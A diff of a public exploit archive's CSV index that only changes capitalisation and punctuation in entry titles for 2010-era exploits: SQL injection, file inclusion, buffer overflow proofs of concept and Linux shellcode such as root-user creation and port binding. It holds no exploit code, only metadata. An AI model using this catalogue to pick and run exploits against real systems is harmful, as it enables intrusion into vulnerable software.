13899,platforms/php/webapps/13899.txt,"Pithcms 0.9.5 - Local File Inclusion",2010-06-17,sh00t0ut,php,webapps,0 13900,platforms/php/webapps/13900.txt,"Easy Travel Portal - SQL Injection",2010-06-17,"L0rd CrusAd3r",php,webapps,0 13901,platforms/php/webapps/13901.txt,"PenPals - Authentication Bypass",2010-06-17,"L0rd CrusAd3r",php,webapps,0 @@ -12263,29 +12264,29 @@ id,file,description,date,author,platform,type,port 13912,platforms/php/webapps/13912.txt,"Havij 1.10 - Persistent Cross-Site Scripting",2010-06-17,hexon,php,webapps,0 13915,platforms/lin_x86-64/shellcode/13915.txt,"Linux/x86-64 - setuid(0) & chmod (_/etc/passwd__ 0777) & exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 13916,platforms/php/webapps/13916.txt,"PHP-Nuke Module print 6.0 - (print&sid) SQL Injection",2010-06-17,Gamoscu,php,webapps,0 -13918,platforms/multiple/webapps/13918.txt,"Spring Framework - arbitrary code execution",2010-06-18,"Meder Kydyraliev",multiple,webapps,0 +13918,platforms/multiple/webapps/13918.txt,"Spring Framework - Arbitrary code Execution",2010-06-18,"Meder Kydyraliev",multiple,webapps,0 13919,platforms/windows/dos/13919.c,"Corel VideoStudio Pro X3 - '.mp4' Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos,0 13920,platforms/windows/dos/13920.c,"H264WebCam - Boundary Condition Error",2010-06-18,"fl0 fl0w",windows,dos,0 -13921,platforms/windows/dos/13921.c,"PowerZip 7.21 - (Build 4010) Stack Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos,0 +13921,platforms/windows/dos/13921.c,"PowerZip 7.21 (Build 4010) - Stack Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos,0 13922,platforms/php/webapps/13922.txt,"Joomla Component com_joomdocs - Cross-Site Scripting",2010-06-18,Sid3^effects,php,webapps,0 13923,platforms/php/webapps/13923.txt,"Joomla Component Answers 2.3beta - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 -13925,platforms/php/webapps/13925.txt,"joomla component ozio Gallery 2 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 -13926,platforms/php/webapps/13926.txt,"joomla component listbingo 1.3 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 +13925,platforms/php/webapps/13925.txt,"joomla Component ozio Gallery 2 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 +13926,platforms/php/webapps/13926.txt,"joomla Component listbingo 1.3 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 13927,platforms/php/webapps/13927.txt,"MarketSaz - Remote file Upload",2010-06-18,NetQurd,php,webapps,0 13929,platforms/php/webapps/13929.txt,"Banner Management Script - SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 13930,platforms/php/webapps/13930.txt,"Shopping Cart Script with Affiliate Program - SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 -13931,platforms/php/webapps/13931.txt,"Kubelance - 'profile.php?id' SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 +13931,platforms/php/webapps/13931.txt,"KubeLance - 'profile.php?id' SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 13932,platforms/windows/remote/13932.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",windows,remote,0 13933,platforms/php/webapps/13933.txt,"UK One Media CMS - 'id' Error Based SQL Injection",2010-06-19,LiquidWorm,php,webapps,0 -13934,platforms/windows/dos/13934.py,"MoreAmp - (.maf) Buffer Overflow (PoC)",2010-06-19,Sid3^effects,windows,dos,0 +13934,platforms/windows/dos/13934.py,"MoreAmp - '.maf' Buffer Overflow (PoC)",2010-06-19,Sid3^effects,windows,dos,0 13935,platforms/php/webapps/13935.txt,"Joomla Component RSComments 1.0.0 - Persistent Cross-Site Scripting",2010-06-19,jdc,php,webapps,0 13936,platforms/php/webapps/13936.txt,"Elite Gaming Ladders 3.5 - SQL Injection (ladder[id])",2010-06-19,ahwak2000,php,webapps,0 13937,platforms/php/webapps/13937.txt,"SnowCade 3.0 - SQL Injection",2010-06-19,ahwak2000,php,webapps,0 13938,platforms/php/webapps/13938.html,"WebsiteBaker 2.8.1 - Cross-Site Request Forgery (PoC)",2010-06-19,"Luis Santana",php,webapps,0 14848,platforms/php/webapps/14848.txt,"Web-Ideas Web Shop Standard - SQL Injection",2010-08-31,Ariko-Security,php,webapps,0 13939,platforms/windows/dos/13939.pl,"Hacker Evolution Game: untold Mod Editor 2.00.001 - Buffer Overflow (PoC)",2010-06-19,gunslinger_,windows,dos,0 -13940,platforms/windows/local/13940.pl,"Orbital Viewer 1.04 - (.ov) Local Universal Stack Overflow (SEH)",2010-06-19,Crazy_Hacker,windows,local,0 -13942,platforms/windows/local/13942.pl,"MoreAmp - (.maf) Local Stack Buffer Overflow (SEH) (calc)",2010-06-20,Madjix,windows,local,0 +13940,platforms/windows/local/13940.pl,"Orbital Viewer 1.04 - '.ov' Local Universal Stack Overflow (SEH)",2010-06-19,Crazy_Hacker,windows,local,0 +13942,platforms/windows/local/13942.pl,"MoreAmp - '.maf' Local Stack Buffer Overflow (SEH) (calc)",2010-06-20,Madjix,windows,local,0 13943,platforms/lin_x86-64/shellcode/13943.c,"Linux/x86-64 - Add root user _shell-storm_ with password _leet_ Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",lin_x86-64,shellcode,0 13944,platforms/php/webapps/13944.txt,"SimpleAssets - Authentication Bypass / Cross-Site Scripting",2010-06-20,"L0rd CrusAd3r",php,webapps,0 13945,platforms/php/webapps/13945.txt,"iBoutique - (page) SQL Injection / Cross-Site Scripting",2010-06-20,"L0rd CrusAd3r",php,webapps,0 @@ -12300,7 +12301,7 @@ id,file,description,date,author,platform,type,port 13956,platforms/php/webapps/13956.txt,"Joomla Hot Property com_jomestate - Remote File Inclusion",2010-06-21,Sid3^effects,php,webapps,0 13957,platforms/php/webapps/13957.txt,"myUPB 2.2.6 - Multiple Vulnerabilities",2010-06-21,"ALTBTA ",php,webapps,0 13958,platforms/windows/dos/13958.txt,"Sysax Multi Server < 5.25 - (SFTP Module) Multiple Commands Denial of Service Vulnerabilities",2010-06-21,leinakesi,windows,dos,0 -13959,platforms/windows/dos/13959.c,"teamspeak 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987 +13959,platforms/windows/dos/13959.c,"TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987 14363,platforms/php/webapps/14363.txt,"Ad Network Script - Persistent Cross-Site Scripting",2010-07-14,Sid3^effects,php,webapps,0 14359,platforms/php/webapps/14359.html,"ZenPhoto CMS 1.3 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-14,10n1z3d,php,webapps,0 14360,platforms/multiple/remote/14360.txt,"Struts2/XWork < 2.2.0 - Remote Command Execution",2010-07-14,"Meder Kydyraliev",multiple,remote,0 @@ -12325,26 +12326,26 @@ id,file,description,date,author,platform,type,port 13982,platforms/php/webapps/13982.txt,"Alpin CMS - 'e4700.asp?id' SQL Injection",2010-06-22,CoBRa_21,php,webapps,0 13983,platforms/php/webapps/13983.txt,"Greeting card 1.1 - SQL Injection",2010-06-22,Net.Edit0r,php,webapps,0 13986,platforms/php/webapps/13986.txt,"Softbiz Resource Repository Script - Blind SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 -13987,platforms/php/webapps/13987.txt,"Pre Multi-Vendor Shopping Malls - SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 +13987,platforms/php/webapps/13987.txt,"Pre Multiple Vendors Shopping Malls - SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 13988,platforms/php/webapps/13988.txt,"PHP Event Calendar 1.5 - Multiple Vulnerabilities",2010-06-22,"cp77fk4r ",php,webapps,0 13990,platforms/asp/webapps/13990.txt,"Boat Classifieds - SQL Injection",2010-06-22,Sangteamtham,asp,webapps,0 13991,platforms/php/webapps/13991.txt,"Softbiz PHP FAQ Script - Blind SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 13992,platforms/php/webapps/13992.txt,"Pre PHP Classifieds - SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 13993,platforms/php/webapps/13993.txt,"k-search - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-06-22,Sangteamtham,php,webapps,0 -14512,platforms/php/webapps/14512.txt,"Concept E-commerce - SQL Injection",2010-07-31,gendenk,php,webapps,0 +14512,platforms/php/webapps/14512.txt,"Concept E-Commerce - SQL Injection",2010-07-31,gendenk,php,webapps,0 13995,platforms/asp/webapps/13995.txt,"Boat Classifieds - 'printdetail.asp?Id' SQL Injection",2010-06-23,CoBRa_21,asp,webapps,0 -13996,platforms/php/webapps/13996.txt,"Pre Multi-Vendor Shopping Malls - 'products.php?sid' SQL Injection",2010-06-23,CoBRa_21,php,webapps,0 +13996,platforms/php/webapps/13996.txt,"Pre Multiple Vendors Shopping Malls - 'products.php?sid' SQL Injection",2010-06-23,CoBRa_21,php,webapps,0 13997,platforms/php/webapps/13997.txt,"Joomla JE Ajax Event Calendar - SQL Injection",2010-06-23,"L0rd CrusAd3r",php,webapps,0 -13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' SEH universale Buffer Overflow",2010-06-23,Madjix,windows,local,0 +13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' SEH Universale Buffer Overflow",2010-06-23,Madjix,windows,local,0 13999,platforms/php/webapps/13999.html,"Software Index - Remote File Upload Exploit",2010-06-23,indoushka,php,webapps,0 14000,platforms/php/webapps/14000.txt,"PishBini Footbal - Cross-Site Scripting / SQL Injection",2010-06-23,indoushka,php,webapps,0 -14001,platforms/multiple/webapps/14001.txt,"InterScan Web Security Virtual Appliance 5.0 - Arbitrary File Download",2010-06-23,"Ivan Huertas",multiple,webapps,0 +14001,platforms/multiple/webapps/14001.txt,"Interscan Web Security Virtual Appliance 5.0 - Arbitrary File Download",2010-06-23,"Ivan Huertas",multiple,webapps,0 14002,platforms/freebsd/local/14002.c,"FreeBSD Kernel - nfs_mount() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0 14003,platforms/freebsd/dos/14003.c,"FreeBSD Kernel - mountnfs() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0 -14004,platforms/multiple/webapps/14004.txt,"InterScan Web Security 5.0 - Arbitrary File Upload / Privilege Escalation",2010-06-23,"Ivan Huertas",multiple,webapps,0 +14004,platforms/multiple/webapps/14004.txt,"Interscan Web Security 5.0 - Arbitrary File Upload / Privilege Escalation",2010-06-23,"Ivan Huertas",multiple,webapps,0 14005,platforms/php/webapps/14005.txt,"2DayBiz MLM Script - SQL Injection",2010-06-23,JaMbA,php,webapps,0 14007,platforms/php/webapps/14007.txt,"Custom Business Card script - SQL Injection",2010-06-23,JaMbA,php,webapps,0 -14008,platforms/php/webapps/14008.txt,"2DayBiz matrimonial Script - SQL Injection",2010-06-23,JaMbA,php,webapps,0 +14008,platforms/php/webapps/14008.txt,"2DayBiz Matrimonial Script - SQL Injection",2010-06-23,JaMbA,php,webapps,0 14009,platforms/php/webapps/14009.txt,"2DayBiz Freelance Script - SQL Injection",2010-06-23,JaMbA,php,webapps,0 14010,platforms/novell/dos/14010.txt,"Novell iManager - Multiple Vulnerabilities",2010-06-24,"Core Security Technologies",novell,dos,48080 14011,platforms/php/webapps/14011.txt,"OpenEMR Electronic Medical Record Software 3.2 - Multiple Vulnerabilities",2010-06-24,"David Shaw",php,webapps,0 @@ -12362,11 +12363,11 @@ id,file,description,date,author,platform,type,port 14028,platforms/php/webapps/14028.txt,"2DayBiz B2B Portal Script - SQL Injection",2010-06-24,JaMbA,php,webapps,0 14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - 'Request' Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0 14030,platforms/asp/webapps/14030.pl,"PHPortal_1.2 - (gunaysoft.php) Remote File Inclusion",2010-06-24,Ma3sTr0-Dz,asp,webapps,0 -14032,platforms/windows/dos/14032.pl,"Winstats - (.fma) Local Buffer Overflow (PoC)",2010-06-24,Madjix,windows,dos,0 +14032,platforms/windows/dos/14032.pl,"Winstats - '.fma' Local Buffer Overflow (PoC)",2010-06-24,Madjix,windows,dos,0 14033,platforms/php/webapps/14033.txt,"Big Forum 5.2 - Arbitrary File Upload / Local File Inclusion",2010-06-24,"Zer0 Thunder",php,webapps,0 14035,platforms/php/webapps/14035.txt,"Big Forum - 'forum.php?id' SQL Injection",2010-06-24,JaMbA,php,webapps,0 -14036,platforms/windows/dos/14036.pl,"Geomau 7 - (.wg2) Local Buffer Overflow (PoC)",2010-06-24,Madjix,windows,dos,0 -14037,platforms/windows/dos/14037.pl,"Plotwn 18 - (.wp2) Local Buffer Overflow (PoC)",2010-06-24,Madjix,windows,dos,0 +14036,platforms/windows/dos/14036.pl,"Geomau 7 - '.wg2' Local Buffer Overflow (PoC)",2010-06-24,Madjix,windows,dos,0 +14037,platforms/windows/dos/14037.pl,"Plotwn 18 - '.wp2' Local Buffer Overflow (PoC)",2010-06-24,Madjix,windows,dos,0 14044,platforms/windows/local/14044.pl,"WM Downloader 2.9.2 - Stack Buffer Overflow",2010-06-25,Madjix,windows,local,0 14116,platforms/arm/shellcode/14116.txt,"Linux/ARM - setuid(0) & kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 14046,platforms/windows/local/14046.py,"FieldNotes 32 5.0 - Buffer Overflow (SEH)",2010-06-25,TecR0c,windows,local,0 @@ -12380,7 +12381,7 @@ id,file,description,date,author,platform,type,port 14054,platforms/php/webapps/14054.txt,"Joomla Component JE Story Submit - SQL Injection",2010-06-25,"L0rd CrusAd3r",php,webapps,0 14055,platforms/php/webapps/14055.txt,"Joomla Component (com_sef) - Remote File Inclusion",2010-06-26,Li0n-PaL,php,webapps,0 14056,platforms/php/webapps/14056.txt,"Clicker CMS - Blind SQL Injection",2010-06-26,hacker@sr.gov.yu,php,webapps,0 -14057,platforms/php/webapps/14057.txt,"Wordpress Cimy Counter Plugin - Exploit",2010-06-26,sebug,php,webapps,0 +14057,platforms/php/webapps/14057.txt,"WordPress Cimy Counter Plugin - Exploit",2010-06-26,sebug,php,webapps,0 14058,platforms/aix/webapps/14058.html,"PHP-Nuke 8.2 - Remote Upload File Exploit",2010-06-26,Net.Edit0r,aix,webapps,0 14059,platforms/php/webapps/14059.txt,"Joomla JE Awd Song Component - Persistent Cross-Site Scripting",2010-06-26,Sid3^effects,php,webapps,0 14060,platforms/php/webapps/14060.txt,"Joomla JE Media Player Component - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0 @@ -12394,7 +12395,7 @@ id,file,description,date,author,platform,type,port 14073,platforms/php/webapps/14073.txt,"2DayBiz Matrimonial Script - smartresult.php SQL Injection",2010-06-27,"Easy Laster",php,webapps,0 14070,platforms/php/webapps/14070.txt,"Speedy 1.0 - Arbitrary File Upload",2010-06-26,"ViRuS Qalaa",php,webapps,0 14071,platforms/windows/dos/14071.pl,"FoxPlayer 2 - '.m3u' Local Buffer Overflow (PoC)",2010-06-26,Madjix,windows,dos,0 -14072,platforms/windows/dos/14072.c,"UltraISO 9.3.6.2750 - (.mds) (.mdf) Buffer Overflow (PoC)",2010-06-27,"fl0 fl0w",windows,dos,0 +14072,platforms/windows/dos/14072.c,"UltraISO 9.3.6.2750 - '.mds' / '.mdf' Buffer Overflow (PoC)",2010-06-27,"fl0 fl0w",windows,dos,0 14074,platforms/php/webapps/14074.rb,"2DayBiz ybiz Polls Script - SQL Injection",2010-06-27,"Easy Laster",php,webapps,0 14075,platforms/php/webapps/14075.rb,"2DayBiz ybiz Freelance Script - SQL Injection",2010-06-27,"Easy Laster",php,webapps,0 14076,platforms/php/webapps/14076.rb,"2DayBiz Photo Sharing Script - SQL Injection (2)",2010-06-27,"Easy Laster",php,webapps,0 @@ -12407,7 +12408,7 @@ id,file,description,date,author,platform,type,port 14083,platforms/linux/dos/14083.pl,"Scite Text Editor 1.76 - Local Buffer Overflow (PoC)",2010-06-27,kmkz,linux,dos,0 14089,platforms/php/webapps/14089.txt,"PageDirector CMS - Multiple Vulnerabilities",2010-06-28,Tr0y-x,php,webapps,0 14097,platforms/arm/shellcode/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",arm,shellcode,0 -14091,platforms/osx/remote/14091.py,"UFO: Alien Invasion 2.2.1 (OSX) - Remote Code Execution",2010-06-28,dookie,osx,remote,0 +14091,platforms/osx/remote/14091.py,"UFO: Alien Invasion 2.2.1 (OS X) - Remote Code Execution",2010-06-28,dookie,osx,remote,0 14094,platforms/php/webapps/14094.txt,"Netartmedia iBoutique.MALL - SQL Injection",2010-06-28,Sid3^effects,php,webapps,0 14095,platforms/php/webapps/14095.txt,"I-net Multi User Email Script - SQL Injection",2010-06-28,Sid3^effects,php,webapps,0 14096,platforms/php/webapps/14096.html,"CMSQLite / CMySQLite 1.3 - Cross-Site Request Forgery",2010-06-28,"ADEO Security",php,webapps,0 @@ -12419,14 +12420,14 @@ id,file,description,date,author,platform,type,port 14104,platforms/multiple/webapps/14104.txt,"Ecomat CMS - SQL Injection",2010-06-29,"High-Tech Bridge SA",multiple,webapps,0 14101,platforms/multiple/webapps/14101.txt,"Subdreamer Pro 3.0.4 - CMS Upload",2010-06-28,Battousai,multiple,webapps,80 14102,platforms/windows/dos/14102.py,"Winamp 5.571 - '.avi' Denial of Service",2010-06-28,"Praveen Darshanam",windows,dos,0 -14103,platforms/multiple/webapps/14103.txt,"Applicure DotDefender 4.01-3 - Persistent Cross-Site Scripting",2010-06-28,EnableSecurity,multiple,webapps,80 +14103,platforms/multiple/webapps/14103.txt,"Applicure dotDefender 4.01-3 - Persistent Cross-Site Scripting",2010-06-28,EnableSecurity,multiple,webapps,80 14109,platforms/php/webapps/14109.txt,"YPNinc PHP Realty Script - (docID) SQL Injection",2010-06-29,v3n0m,php,webapps,0 14110,platforms/php/webapps/14110.txt,"Allomani - E-Store 1.0 - Cross-Site Request Forgery (Add Admin Account)",2010-06-29,G0D-F4Th3r,php,webapps,0 -14111,platforms/php/webapps/14111.txt,"Allomani - Super Multimedia 2.5 - Cross-Site Request Forgery (Add Admin Account)",2010-06-29,G0D-F4Th3r,php,webapps,0 +14111,platforms/php/webapps/14111.txt,"Allomani - Super MultiMedia 2.5 - Cross-Site Request Forgery (Add Admin Account)",2010-06-29,G0D-F4Th3r,php,webapps,0 14112,platforms/php/webapps/14112.txt,"PageDirector CMS - 'result.php' SQL Injection",2010-06-29,v3n0m,php,webapps,0 14115,platforms/windows/webapps/14115.txt,"Gekko CMS - SQL Injection",2010-06-29,[]0iZy5,windows,webapps,80 14117,platforms/multiple/webapps/14117.txt,"CubeCart PHP (shipkey parameter) 4.3.x - SQL Injection",2010-06-29,"Core Security",multiple,webapps,80 -30100,platforms/windows/remote/30100.html,"British Telecommunications Consumer Webhelper 2.0.0.7 - Multiple Buffer Overflow Vulnerabilities",2007-05-29,"Will Dormann",windows,remote,0 +30100,platforms/windows/remote/30100.html,"British TeleCommunications Consumer Webhelper 2.0.0.7 - Multiple Buffer Overflow Vulnerabilities",2007-05-29,"Will Dormann",windows,remote,0 14118,platforms/multiple/webapps/14118.txt,"LIOOSYS CMS - 'news.php' SQL Injection",2010-06-29,GlaDiaT0R,multiple,webapps,80 14119,platforms/lin_x86/shellcode/14119.c,"Linux/x86 - Polymorphic /bin/sh Shellcode (116 bytes)",2010-06-29,gunslinger_,lin_x86,shellcode,0 14274,platforms/php/webapps/14274.txt,"Joomla Music Manager Component - Local File Inclusion",2010-07-08,Sid3^effects,php,webapps,0 @@ -12436,7 +12437,7 @@ id,file,description,date,author,platform,type,port 14123,platforms/php/webapps/14123.txt,"WebDM CMS - SQL Injection",2010-06-29,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 14124,platforms/php/webapps/14124.pl,"PHP-Nuke 8.0 - SQL Injection",2010-06-30,Dante90,php,webapps,0 14125,platforms/php/webapps/14125.pl,"ShopCartDx 4.30 - (products.php) Blind SQL Injection",2010-06-30,Dante90,php,webapps,0 -14126,platforms/php/webapps/14126.txt,"joomla component gamesbox com_gamesbox 1.0.2 - 'id' SQL Injection",2010-06-30,v3n0m,php,webapps,0 +14126,platforms/php/webapps/14126.txt,"joomla Component gamesbox com_gamesbox 1.0.2 - 'id' SQL Injection",2010-06-30,v3n0m,php,webapps,0 14127,platforms/php/webapps/14127.txt,"Joomla Joomanager - SQL Injection",2010-06-30,Sid3^effects,php,webapps,0 14141,platforms/php/webapps/14141.pl,"Oxygen2PHP 1.1.3 - (member.php) SQL Injection",2010-06-30,Dante90,php,webapps,0 14132,platforms/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",php,webapps,0 @@ -12453,47 +12454,47 @@ id,file,description,date,author,platform,type,port 14154,platforms/php/webapps/14154.txt,"Joomla Component com_dateconverter 0.1 - SQL Injection",2010-07-01,RoAd_KiLlEr,php,webapps,0 14155,platforms/asp/webapps/14155.txt,"SIDA University System - SQL Injection",2010-07-01,K053,asp,webapps,0 14209,platforms/php/webapps/14209.txt,"Joomla Front-End Article Manager System - Upload",2010-07-04,Sid3^effects,php,webapps,0 -14156,platforms/windows/dos/14156.txt,"Windows Vista/Server 2008 - NtUserCheckAccessForIntegrityLevel Use-After-Free",2010-07-01,MSRC,windows,dos,0 +14156,platforms/windows/dos/14156.txt,"Microsoft Windows Vista/Server 2008 - NtUserCheckAccessForIntegrityLevel Use-After-Free",2010-07-01,MSRC,windows,dos,0 14165,platforms/php/webapps/14165.txt,"iScripts EasyBiller - Cross-Site Scripting",2010-07-02,Sangteamtham,php,webapps,0 14163,platforms/php/webapps/14163.txt,"iScripts ReserveLogic 1.0 - SQL Injection",2010-07-01,"Salvatore Fresta",php,webapps,0 14164,platforms/php/webapps/14164.txt,"iScripts CyberMatch 1.0 - Blind SQL Injection",2010-07-02,"Salvatore Fresta",php,webapps,0 -14160,platforms/php/webapps/14160.txt,"InterScan Web Security 5.0 - Permanent Cross-Site Scripting",2010-07-01,"Ivan Huertas",php,webapps,0 +14160,platforms/php/webapps/14160.txt,"Interscan Web Security 5.0 - Permanent Cross-Site Scripting",2010-07-01,"Ivan Huertas",php,webapps,0 14177,platforms/linux/webapps/14177.txt,"Xplico 0.5.7 - (add.ctp) Remote Cross-Site Scripting",2010-07-02,"Marcos Garcia and Maximiliano Soler",linux,webapps,0 14162,platforms/php/webapps/14162.txt,"iScripts EasySnaps 2.0 - Multiple SQL Injections",2010-07-01,"Salvatore Fresta",php,webapps,0 -14176,platforms/php/webapps/14176.c,"iScripts SocialWare 2.2.x - Arbitrary File Upload",2010-07-02,"Salvatore Fresta",php,webapps,0 +14176,platforms/php/webapps/14176.c,"iScripts Socialware 2.2.x - Arbitrary File Upload",2010-07-02,"Salvatore Fresta",php,webapps,0 14166,platforms/php/webapps/14166.txt,"Bit Weaver 2.7 - Local File Inclusion",2010-07-02,"John Leitch",php,webapps,0 14171,platforms/php/webapps/14171.txt,"Iphone Pointter Social Network - Local File Inclusion",2010-07-02,Sid3^effects,php,webapps,0 14172,platforms/php/webapps/14172.txt,"Joomla Seyret Video Component (com_seyret) - Blind SQL Injection",2010-07-02,RoAd_KiLlEr,php,webapps,0 14170,platforms/php/webapps/14170.txt,"Pointter Social Network - Local File Inclusion",2010-07-02,Sid3^effects,php,webapps,0 14168,platforms/asp/webapps/14168.txt,"VGM Forbin - 'article.asp' SQL Injection",2010-07-02,"Th3 RDX",asp,webapps,0 14169,platforms/asp/webapps/14169.txt,"MooreAdvice - 'productlist.asp' SQL Injection",2010-07-02,"Th3 RDX",asp,webapps,0 -14175,platforms/windows/dos/14175.pl,"Mp3 Digitalbox 2.7.2.0 - (.mp3) Local Stack Overflow (PoC)",2010-07-02,v3n0m,windows,dos,0 +14175,platforms/windows/dos/14175.pl,"Mp3 Digitalbox 2.7.2.0 - '.mp3' Local Stack Overflow (PoC)",2010-07-02,v3n0m,windows,dos,0 14183,platforms/php/webapps/14183.txt,"Joomla Component Seyret (com_seyret) - Local File Inclusion",2010-07-03,"Cooler_ unix",php,webapps,0 -14179,platforms/windows/remote/14179.txt,"Microsoft Internet Information Services (IIS) 5 - Authentication Bypass (MS10-065)",2010-07-02,"Soroush Dalili",windows,remote,0 +14179,platforms/windows/remote/14179.txt,"Microsoft IIS 5.0 - Authentication Bypass (MS10-065)",2010-07-02,"Soroush Dalili",windows,remote,0 14180,platforms/windows/remote/14180.py,"HP OpenView NNM - getnnmdata.exe CGI Invalid MaxAge Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 14181,platforms/windows/remote/14181.py,"HP OpenView NNM - getnnmdata.exe CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 14182,platforms/windows/remote/14182.py,"HP OpenView NNM - getnnmdata.exe CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 14192,platforms/asp/webapps/14192.txt,"Ziggurat Farsi CMS - SQL Injection",2010-07-03,"Arash Saadatfar",asp,webapps,0 -14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 - (fckeditor) Remote File Upload",2010-07-03,ITSecTeam,php,webapps,0 +14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 - 'FCKeditor' Remote File Upload",2010-07-03,ITSecTeam,php,webapps,0 14185,platforms/multiple/dos/14185.py,"ISC-DHCPD - Denial of Service",2010-07-03,sid,multiple,dos,0 14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0 14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting AddOn - Remote File Inclusion",2010-07-03,lumut--,php,webapps,0 14187,platforms/php/webapps/14187.txt,"Joomla eventcal Component 1.6.4 com_eventcal - Blind SQL Injection",2010-07-03,RoAd_KiLlEr,php,webapps,0 14188,platforms/php/webapps/14188.html,"Cpanel 11.25 - Cross-Site Request Forgery (Add FTP Account) Exploit",2010-07-03,G0D-F4Th3r,php,webapps,0 14190,platforms/arm/shellcode/14190.c,"Linux/ARM - Polymorphic execve(_/bin/sh__ [_/bin/sh_]_ NULL); - XOR 88 encoded Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0 -14193,platforms/php/webapps/14193.c,"iscripts socialware 2.2.x - Multiple Vulnerabilities",2010-07-03,"Salvatore Fresta",php,webapps,0 +14193,platforms/php/webapps/14193.c,"iscripts Socialware 2.2.x - Multiple Vulnerabilities",2010-07-03,"Salvatore Fresta",php,webapps,0 14194,platforms/windows/remote/14194.cpp,"Sun Java Web Server 7.0 u7 - Remote Exploit",2010-07-03,dmc,windows,remote,0 14195,platforms/windows/remote/14195.html,"SasCam WebCam Server 2.6.5 - ActiveX SEH Overwrite",2010-07-03,blake,windows,remote,0 14208,platforms/php/webapps/14208.txt,"Sandbox 2.0.2 - Local File Inclusion",2010-07-04,saudi0hacker,php,webapps,0 14196,platforms/php/webapps/14196.txt,"Joomla SocialAds Component com_socialads - Persistent Cross-Site Scripting",2010-07-03,Sid3^effects,php,webapps,0 14197,platforms/php/webapps/14197.txt,"iScripts MultiCart 2.2 - Multiple SQL Injections",2010-07-03,"Salvatore Fresta",php,webapps,0 -14198,platforms/php/webapps/14198.txt,"Simple:Press Wordpress Plugin 4.3.0 - SQL Injection",2010-07-04,"ADEO Security",php,webapps,0 +14198,platforms/php/webapps/14198.txt,"Simple:Press WordPress Plugin 4.3.0 - SQL Injection",2010-07-04,"ADEO Security",php,webapps,0 14199,platforms/php/webapps/14199.txt,"PHPaaCMS 0.3.1 - (show.php?id=) SQL Injection",2010-07-04,Shafiq-Ur-Rehman,php,webapps,0 14200,platforms/windows/remote/14200.html,"Registry OCX 1.5 - ActiveX Buffer Overflow",2010-07-04,blake,windows,remote,0 14201,platforms/php/webapps/14201.txt,"PHPaaCMS - 'list.php?id' SQL Injection",2010-07-04,CoBRa_21,php,webapps,0 14202,platforms/php/webapps/14202.txt,"iLister Listing Software - Local File Inclusion",2010-07-04,Sid3^effects,php,webapps,0 14203,platforms/php/webapps/14203.txt,"TCW PHP Album - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 -14204,platforms/php/webapps/14204.txt,"Esoftpro Online GuestBook Pro - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 +14204,platforms/php/webapps/14204.txt,"Esoftpro Online Guestbook Pro - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 14205,platforms/php/webapps/14205.txt,"Esoftpro Online Photo Pro 2 - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 14206,platforms/php/webapps/14206.txt,"Esoftpro Online Contact Manager - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 14207,platforms/php/webapps/14207.txt,"Joomla Phoca Gallery Component (com_phocagallery) - SQL Injection",2010-07-04,RoAd_KiLlEr,php,webapps,0 @@ -12523,19 +12524,19 @@ id,file,description,date,author,platform,type,port 14234,platforms/linux/shellcode/14234.c,"Linux - 125 bind port to 6778 XOR encoded polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface Denial of Service",2010-07-06,muts,windows,dos,8800 